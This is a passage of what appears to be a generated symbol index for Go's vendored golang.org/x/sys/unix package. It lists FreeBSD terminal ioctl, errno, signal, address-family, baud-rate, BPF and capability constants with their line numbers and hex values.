TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1688) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1689) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1690) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1691) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1692) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1693) | TIOCPKT_STOP = 0x4 constant TIOCPTMASTER (line 1694) | TIOCPTMASTER = 0x2000741c constant TIOCSBRK (line 1695) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1696) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1697) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1698) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1699) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1700) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1701) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1702) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1703) | TIOCSIG = 0x2004745f constant TIOCSPGRP (line 1704) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1705) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1706) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1707) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1708) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1709) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1710) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1711) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1712) | TOSTOP = 0x400000 constant UTIME_NOW (line 1713) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1714) | UTIME_OMIT = -0x2 constant VDISCARD (line 1715) | VDISCARD = 0xf constant VDSUSP (line 1716) | VDSUSP = 0xb constant VEOF (line 1717) | VEOF = 0x0 constant VEOL (line 1718) | VEOL = 0x1 constant VEOL2 (line 1719) | VEOL2 = 0x2 constant VERASE (line 1720) | VERASE = 0x3 constant VERASE2 (line 1721) | VERASE2 = 0x7 constant VINTR (line 1722) | VINTR = 0x8 constant VKILL (line 1723) | VKILL = 0x5 constant VLNEXT (line 1724) | VLNEXT = 0xe constant VMIN (line 1725) | VMIN = 0x10 constant VM_BCACHE_SIZE_MAX (line 1726) | VM_BCACHE_SIZE_MAX = 0x19000000 constant VQUIT (line 1727) | VQUIT = 0x9 constant VREPRINT (line 1728) | VREPRINT = 0x6 constant VSTART (line 1729) | VSTART = 0xc constant VSTATUS (line 1730) | VSTATUS = 0x12 constant VSTOP (line 1731) | VSTOP = 0xd constant VSUSP (line 1732) | VSUSP = 0xa constant VTIME (line 1733) | VTIME = 0x11 constant VWERASE (line 1734) | VWERASE = 0x4 constant WCONTINUED (line 1735) | WCONTINUED = 0x4 constant WCOREFLAG (line 1736) | WCOREFLAG = 0x80 constant WEXITED (line 1737) | WEXITED = 0x10 constant WLINUXCLONE (line 1738) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1739) | WNOHANG = 0x1 constant WNOWAIT (line 1740) | WNOWAIT = 0x8 constant WSTOPPED (line 1741) | WSTOPPED = 0x2 constant WTRAPPED (line 1742) | WTRAPPED = 0x20 constant WUNTRACED (line 1743) | WUNTRACED = 0x2 constant E2BIG (line 1748) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1749) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1750) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1751) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1752) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1753) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1754) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1755) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1756) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1757) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1758) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1759) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1760) | ECANCELED = syscall.Errno(0x55) constant ECAPMODE (line 1761) | ECAPMODE = syscall.Errno(0x5e) constant ECHILD (line 1762) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1763) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1764) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1765) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1766) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1767) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1768) | EDOM = syscall.Errno(0x21) constant EDOOFUS (line 1769) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1770) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1771) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1772) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1773) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1774) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1775) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1776) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1777) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1778) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1779) | EINPROGRESS = syscall.Errno(0x24) constant EINTEGRITY (line 1780) | EINTEGRITY = syscall.Errno(0x61) constant EINTR (line 1781) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1782) | EINVAL = syscall.Errno(0x16) constant EIO (line 1783) | EIO = syscall.Errno(0x5) constant EISCONN (line 1784) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1785) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1786) | ELAST = syscall.Errno(0x61) constant ELOOP (line 1787) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1788) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1789) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1790) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1791) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1792) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1793) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1794) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1795) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1796) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1797) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1798) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1799) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1800) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1801) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1802) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1803) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1804) | ENOLINK = syscall.Errno(0x5b) constant ENOMEM (line 1805) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1806) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1807) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1808) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1809) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1810) | ENOTBLK = syscall.Errno(0xf) constant ENOTCAPABLE (line 1811) | ENOTCAPABLE = syscall.Errno(0x5d) constant ENOTCONN (line 1812) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1813) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1814) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1815) | ENOTRECOVERABLE = syscall.Errno(0x5f) constant ENOTSOCK (line 1816) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1817) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1818) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1819) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1820) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1821) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1822) | EOWNERDEAD = syscall.Errno(0x60) constant EPERM (line 1823) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1824) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1825) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1826) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1827) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1828) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1829) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1830) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1831) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1832) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1833) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1834) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1835) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1836) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1837) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1838) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1839) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1840) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1841) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1842) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1843) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1844) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1845) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1846) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1847) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1852) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1853) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1854) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1855) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1856) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1857) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1858) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1859) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1860) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1861) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1862) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1863) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1864) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1865) | SIGKILL = syscall.Signal(0x9) constant SIGLIBRT (line 1866) | SIGLIBRT = syscall.Signal(0x21) constant SIGLWP (line 1867) | SIGLWP = syscall.Signal(0x20) constant SIGPIPE (line 1868) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1869) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1870) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1871) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1872) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1873) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1874) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1875) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1876) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1877) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1878) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1879) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1880) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1881) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1882) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1883) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1884) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1885) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1886) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_freebsd_riscv64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x23 constant AF_ATM (line 16) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 17) | AF_BLUETOOTH = 0x24 constant AF_CCITT (line 18) | AF_CCITT = 0xa constant AF_CHAOS (line 19) | AF_CHAOS = 0x5 constant AF_CNT (line 20) | AF_CNT = 0x15 constant AF_COIP (line 21) | AF_COIP = 0x14 constant AF_DATAKIT (line 22) | AF_DATAKIT = 0x9 constant AF_DECnet (line 23) | AF_DECnet = 0xc constant AF_DLI (line 24) | AF_DLI = 0xd constant AF_E164 (line 25) | AF_E164 = 0x1a constant AF_ECMA (line 26) | AF_ECMA = 0x8 constant AF_HYLINK (line 27) | AF_HYLINK = 0xf constant AF_HYPERV (line 28) | AF_HYPERV = 0x2b constant AF_IEEE80211 (line 29) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 30) | AF_IMPLINK = 0x3 constant AF_INET (line 31) | AF_INET = 0x2 constant AF_INET6 (line 32) | AF_INET6 = 0x1c constant AF_INET6_SDP (line 33) | AF_INET6_SDP = 0x2a constant AF_INET_SDP (line 34) | AF_INET_SDP = 0x28 constant AF_IPX (line 35) | AF_IPX = 0x17 constant AF_ISDN (line 36) | AF_ISDN = 0x1a constant AF_ISO (line 37) | AF_ISO = 0x7 constant AF_LAT (line 38) | AF_LAT = 0xe constant AF_LINK (line 39) | AF_LINK = 0x12 constant AF_LOCAL (line 40) | AF_LOCAL = 0x1 constant AF_MAX (line 41) | AF_MAX = 0x2b constant AF_NATM (line 42) | AF_NATM = 0x1d constant AF_NETBIOS (line 43) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 44) | AF_NETGRAPH = 0x20 constant AF_OSI (line 45) | AF_OSI = 0x7 constant AF_PUP (line 46) | AF_PUP = 0x4 constant AF_ROUTE (line 47) | AF_ROUTE = 0x11 constant AF_SCLUSTER (line 48) | AF_SCLUSTER = 0x22 constant AF_SIP (line 49) | AF_SIP = 0x18 constant AF_SLOW (line 50) | AF_SLOW = 0x21 constant AF_SNA (line 51) | AF_SNA = 0xb constant AF_UNIX (line 52) | AF_UNIX = 0x1 constant AF_UNSPEC (line 53) | AF_UNSPEC = 0x0 constant AF_VENDOR00 (line 54) | AF_VENDOR00 = 0x27 constant AF_VENDOR01 (line 55) | AF_VENDOR01 = 0x29 constant AF_VENDOR03 (line 56) | AF_VENDOR03 = 0x2d constant AF_VENDOR04 (line 57) | AF_VENDOR04 = 0x2f constant AF_VENDOR05 (line 58) | AF_VENDOR05 = 0x31 constant AF_VENDOR06 (line 59) | AF_VENDOR06 = 0x33 constant AF_VENDOR07 (line 60) | AF_VENDOR07 = 0x35 constant AF_VENDOR08 (line 61) | AF_VENDOR08 = 0x37 constant AF_VENDOR09 (line 62) | AF_VENDOR09 = 0x39 constant AF_VENDOR10 (line 63) | AF_VENDOR10 = 0x3b constant AF_VENDOR11 (line 64) | AF_VENDOR11 = 0x3d constant AF_VENDOR12 (line 65) | AF_VENDOR12 = 0x3f constant AF_VENDOR13 (line 66) | AF_VENDOR13 = 0x41 constant AF_VENDOR14 (line 67) | AF_VENDOR14 = 0x43 constant AF_VENDOR15 (line 68) | AF_VENDOR15 = 0x45 constant AF_VENDOR16 (line 69) | AF_VENDOR16 = 0x47 constant AF_VENDOR17 (line 70) | AF_VENDOR17 = 0x49 constant AF_VENDOR18 (line 71) | AF_VENDOR18 = 0x4b constant AF_VENDOR19 (line 72) | AF_VENDOR19 = 0x4d constant AF_VENDOR20 (line 73) | AF_VENDOR20 = 0x4f constant AF_VENDOR21 (line 74) | AF_VENDOR21 = 0x51 constant AF_VENDOR22 (line 75) | AF_VENDOR22 = 0x53 constant AF_VENDOR23 (line 76) | AF_VENDOR23 = 0x55 constant AF_VENDOR24 (line 77) | AF_VENDOR24 = 0x57 constant AF_VENDOR25 (line 78) | AF_VENDOR25 = 0x59 constant AF_VENDOR26 (line 79) | AF_VENDOR26 = 0x5b constant AF_VENDOR27 (line 80) | AF_VENDOR27 = 0x5d constant AF_VENDOR28 (line 81) | AF_VENDOR28 = 0x5f constant AF_VENDOR29 (line 82) | AF_VENDOR29 = 0x61 constant AF_VENDOR30 (line 83) | AF_VENDOR30 = 0x63 constant AF_VENDOR31 (line 84) | AF_VENDOR31 = 0x65 constant AF_VENDOR32 (line 85) | AF_VENDOR32 = 0x67 constant AF_VENDOR33 (line 86) | AF_VENDOR33 = 0x69 constant AF_VENDOR34 (line 87) | AF_VENDOR34 = 0x6b constant AF_VENDOR35 (line 88) | AF_VENDOR35 = 0x6d constant AF_VENDOR36 (line 89) | AF_VENDOR36 = 0x6f constant AF_VENDOR37 (line 90) | AF_VENDOR37 = 0x71 constant AF_VENDOR38 (line 91) | AF_VENDOR38 = 0x73 constant AF_VENDOR39 (line 92) | AF_VENDOR39 = 0x75 constant AF_VENDOR40 (line 93) | AF_VENDOR40 = 0x77 constant AF_VENDOR41 (line 94) | AF_VENDOR41 = 0x79 constant AF_VENDOR42 (line 95) | AF_VENDOR42 = 0x7b constant AF_VENDOR43 (line 96) | AF_VENDOR43 = 0x7d constant AF_VENDOR44 (line 97) | AF_VENDOR44 = 0x7f constant AF_VENDOR45 (line 98) | AF_VENDOR45 = 0x81 constant AF_VENDOR46 (line 99) | AF_VENDOR46 = 0x83 constant AF_VENDOR47 (line 100) | AF_VENDOR47 = 0x85 constant ALTWERASE (line 101) | ALTWERASE = 0x200 constant B0 (line 102) | B0 = 0x0 constant B1000000 (line 103) | B1000000 = 0xf4240 constant B110 (line 104) | B110 = 0x6e constant B115200 (line 105) | B115200 = 0x1c200 constant B1200 (line 106) | B1200 = 0x4b0 constant B134 (line 107) | B134 = 0x86 constant B14400 (line 108) | B14400 = 0x3840 constant B150 (line 109) | B150 = 0x96 constant B1500000 (line 110) | B1500000 = 0x16e360 constant B1800 (line 111) | B1800 = 0x708 constant B19200 (line 112) | B19200 = 0x4b00 constant B200 (line 113) | B200 = 0xc8 constant B2000000 (line 114) | B2000000 = 0x1e8480 constant B230400 (line 115) | B230400 = 0x38400 constant B2400 (line 116) | B2400 = 0x960 constant B2500000 (line 117) | B2500000 = 0x2625a0 constant B28800 (line 118) | B28800 = 0x7080 constant B300 (line 119) | B300 = 0x12c constant B3000000 (line 120) | B3000000 = 0x2dc6c0 constant B3500000 (line 121) | B3500000 = 0x3567e0 constant B38400 (line 122) | B38400 = 0x9600 constant B4000000 (line 123) | B4000000 = 0x3d0900 constant B460800 (line 124) | B460800 = 0x70800 constant B4800 (line 125) | B4800 = 0x12c0 constant B50 (line 126) | B50 = 0x32 constant B500000 (line 127) | B500000 = 0x7a120 constant B57600 (line 128) | B57600 = 0xe100 constant B600 (line 129) | B600 = 0x258 constant B7200 (line 130) | B7200 = 0x1c20 constant B75 (line 131) | B75 = 0x4b constant B76800 (line 132) | B76800 = 0x12c00 constant B921600 (line 133) | B921600 = 0xe1000 constant B9600 (line 134) | B9600 = 0x2580 constant BIOCFEEDBACK (line 135) | BIOCFEEDBACK = 0x8004427c constant BIOCFLUSH (line 136) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 137) | BIOCGBLEN = 0x40044266 constant BIOCGDIRECTION (line 138) | BIOCGDIRECTION = 0x40044276 constant BIOCGDLT (line 139) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 140) | BIOCGDLTLIST = 0xc0104279 constant BIOCGETBUFMODE (line 141) | BIOCGETBUFMODE = 0x4004427d constant BIOCGETIF (line 142) | BIOCGETIF = 0x4020426b constant BIOCGETZMAX (line 143) | BIOCGETZMAX = 0x4008427f constant BIOCGHDRCMPLT (line 144) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 145) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 146) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 147) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 148) | BIOCGSTATS = 0x4008426f constant BIOCGTSTAMP (line 149) | BIOCGTSTAMP = 0x40044283 constant BIOCIMMEDIATE (line 150) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 151) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 152) | BIOCPROMISC = 0x20004269 constant BIOCROTZBUF (line 153) | BIOCROTZBUF = 0x40184280 constant BIOCSBLEN (line 154) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRECTION (line 155) | BIOCSDIRECTION = 0x80044277 constant BIOCSDLT (line 156) | BIOCSDLT = 0x80044278 constant BIOCSETBUFMODE (line 157) | BIOCSETBUFMODE = 0x8004427e constant BIOCSETF (line 158) | BIOCSETF = 0x80104267 constant BIOCSETFNR (line 159) | BIOCSETFNR = 0x80104282 constant BIOCSETIF (line 160) | BIOCSETIF = 0x8020426c constant BIOCSETVLANPCP (line 161) | BIOCSETVLANPCP = 0x80044285 constant BIOCSETWF (line 162) | BIOCSETWF = 0x8010427b constant BIOCSETZBUF (line 163) | BIOCSETZBUF = 0x80184281 constant BIOCSHDRCMPLT (line 164) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 165) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 166) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 167) | BIOCSSEESENT = 0x80044277 constant BIOCSTSTAMP (line 168) | BIOCSTSTAMP = 0x80044284 constant BIOCVERSION (line 169) | BIOCVERSION = 0x40044271 constant BPF_A (line 170) | BPF_A = 0x10 constant BPF_ABS (line 171) | BPF_ABS = 0x20 constant BPF_ADD (line 172) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 173) | BPF_ALIGNMENT = 0x8 constant BPF_ALU (line 174) | BPF_ALU = 0x4 constant BPF_AND (line 175) | BPF_AND = 0x50 constant BPF_B (line 176) | BPF_B = 0x10 constant BPF_BUFMODE_BUFFER (line 177) | BPF_BUFMODE_BUFFER = 0x1 constant BPF_BUFMODE_ZBUF (line 178) | BPF_BUFMODE_ZBUF = 0x2 constant BPF_DIV (line 179) | BPF_DIV = 0x30 constant BPF_H (line 180) | BPF_H = 0x8 constant BPF_IMM (line 181) | BPF_IMM = 0x0 constant BPF_IND (line 182) | BPF_IND = 0x40 constant BPF_JA (line 183) | BPF_JA = 0x0 constant BPF_JEQ (line 184) | BPF_JEQ = 0x10 constant BPF_JGE (line 185) | BPF_JGE = 0x30 constant BPF_JGT (line 186) | BPF_JGT = 0x20 constant BPF_JMP (line 187) | BPF_JMP = 0x5 constant BPF_JSET (line 188) | BPF_JSET = 0x40 constant BPF_K (line 189) | BPF_K = 0x0 constant BPF_LD (line 190) | BPF_LD = 0x0 constant BPF_LDX (line 191) | BPF_LDX = 0x1 constant BPF_LEN (line 192) | BPF_LEN = 0x80 constant BPF_LSH (line 193) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 194) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 195) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 196) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 197) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 198) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 199) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 200) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 201) | BPF_MISC = 0x7 constant BPF_MOD (line 202) | BPF_MOD = 0x90 constant BPF_MSH (line 203) | BPF_MSH = 0xa0 constant BPF_MUL (line 204) | BPF_MUL = 0x20 constant BPF_NEG (line 205) | BPF_NEG = 0x80 constant BPF_OR (line 206) | BPF_OR = 0x40 constant BPF_RELEASE (line 207) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 208) | BPF_RET = 0x6 constant BPF_RSH (line 209) | BPF_RSH = 0x70 constant BPF_ST (line 210) | BPF_ST = 0x2 constant BPF_STX (line 211) | BPF_STX = 0x3 constant BPF_SUB (line 212) | BPF_SUB = 0x10 constant BPF_TAX (line 213) | BPF_TAX = 0x0 constant BPF_TXA (line 214) | BPF_TXA = 0x80 constant BPF_T_BINTIME (line 215) | BPF_T_BINTIME = 0x2 constant BPF_T_BINTIME_FAST (line 216) | BPF_T_BINTIME_FAST = 0x102 constant BPF_T_BINTIME_MONOTONIC (line 217) | BPF_T_BINTIME_MONOTONIC = 0x202 constant BPF_T_BINTIME_MONOTONIC_FAST (line 218) | BPF_T_BINTIME_MONOTONIC_FAST = 0x302 constant BPF_T_FAST (line 219) | BPF_T_FAST = 0x100 constant BPF_T_FLAG_MASK (line 220) | BPF_T_FLAG_MASK = 0x300 constant BPF_T_FORMAT_MASK (line 221) | BPF_T_FORMAT_MASK = 0x3 constant BPF_T_MICROTIME (line 222) | BPF_T_MICROTIME = 0x0 constant BPF_T_MICROTIME_FAST (line 223) | BPF_T_MICROTIME_FAST = 0x100 constant BPF_T_MICROTIME_MONOTONIC (line 224) | BPF_T_MICROTIME_MONOTONIC = 0x200 constant BPF_T_MICROTIME_MONOTONIC_FAST (line 225) | BPF_T_MICROTIME_MONOTONIC_FAST = 0x300 constant BPF_T_MONOTONIC (line 226) | BPF_T_MONOTONIC = 0x200 constant BPF_T_MONOTONIC_FAST (line 227) | BPF_T_MONOTONIC_FAST = 0x300 constant BPF_T_NANOTIME (line 228) | BPF_T_NANOTIME = 0x1 constant BPF_T_NANOTIME_FAST (line 229) | BPF_T_NANOTIME_FAST = 0x101 constant BPF_T_NANOTIME_MONOTONIC (line 230) | BPF_T_NANOTIME_MONOTONIC = 0x201 constant BPF_T_NANOTIME_MONOTONIC_FAST (line 231) | BPF_T_NANOTIME_MONOTONIC_FAST = 0x301 constant BPF_T_NONE (line 232) | BPF_T_NONE = 0x3 constant BPF_T_NORMAL (line 233) | BPF_T_NORMAL = 0x0 constant BPF_W (line 234) | BPF_W = 0x0 constant BPF_X (line 235) | BPF_X = 0x8 constant BPF_XOR (line 236) | BPF_XOR = 0xa0 constant BRKINT (line 237) | BRKINT = 0x2 constant CAP_ACCEPT (line 238) | CAP_ACCEPT = 0x200000020000000 constant CAP_ACL_CHECK (line 239) | CAP_ACL_CHECK = 0x400000000010000 constant CAP_ACL_DELETE (line 240) | CAP_ACL_DELETE = 0x400000000020000 constant CAP_ACL_GET (line 241) | CAP_ACL_GET = 0x400000000040000 constant CAP_ACL_SET (line 242) | CAP_ACL_SET = 0x400000000080000 constant CAP_ALL0 (line 243) | CAP_ALL0 = 0x20007ffffffffff constant CAP_ALL1 (line 244) | CAP_ALL1 = 0x4000000001fffff constant CAP_BIND (line 245) | CAP_BIND = 0x200000040000000 constant CAP_BINDAT (line 246) | CAP_BINDAT = 0x200008000000400 constant CAP_CHFLAGSAT (line 247) | CAP_CHFLAGSAT = 0x200000000001400 constant CAP_CONNECT (line 248) | CAP_CONNECT = 0x200000080000000 constant CAP_CONNECTAT (line 249) | CAP_CONNECTAT = 0x200010000000400 constant CAP_CREATE (line 250) | CAP_CREATE = 0x200000000000040 constant CAP_EVENT (line 251) | CAP_EVENT = 0x400000000000020 constant CAP_EXTATTR_DELETE (line 252) | CAP_EXTATTR_DELETE = 0x400000000001000 constant CAP_EXTATTR_GET (line 253) | CAP_EXTATTR_GET = 0x400000000002000 constant CAP_EXTATTR_LIST (line 254) | CAP_EXTATTR_LIST = 0x400000000004000 constant CAP_EXTATTR_SET (line 255) | CAP_EXTATTR_SET = 0x400000000008000 constant CAP_FCHDIR (line 256) | CAP_FCHDIR = 0x200000000000800 constant CAP_FCHFLAGS (line 257) | CAP_FCHFLAGS = 0x200000000001000 constant CAP_FCHMOD (line 258) | CAP_FCHMOD = 0x200000000002000 constant CAP_FCHMODAT (line 259) | CAP_FCHMODAT = 0x200000000002400 constant CAP_FCHOWN (line 260) | CAP_FCHOWN = 0x200000000004000 constant CAP_FCHOWNAT (line 261) | CAP_FCHOWNAT = 0x200000000004400 constant CAP_FCNTL (line 262) | CAP_FCNTL = 0x200000000008000 constant CAP_FCNTL_ALL (line 263) | CAP_FCNTL_ALL = 0x78 constant CAP_FCNTL_GETFL (line 264) | CAP_FCNTL_GETFL = 0x8 constant CAP_FCNTL_GETOWN (line 265) | CAP_FCNTL_GETOWN = 0x20 constant CAP_FCNTL_SETFL (line 266) | CAP_FCNTL_SETFL = 0x10 constant CAP_FCNTL_SETOWN (line 267) | CAP_FCNTL_SETOWN = 0x40 constant CAP_FEXECVE (line 268) | 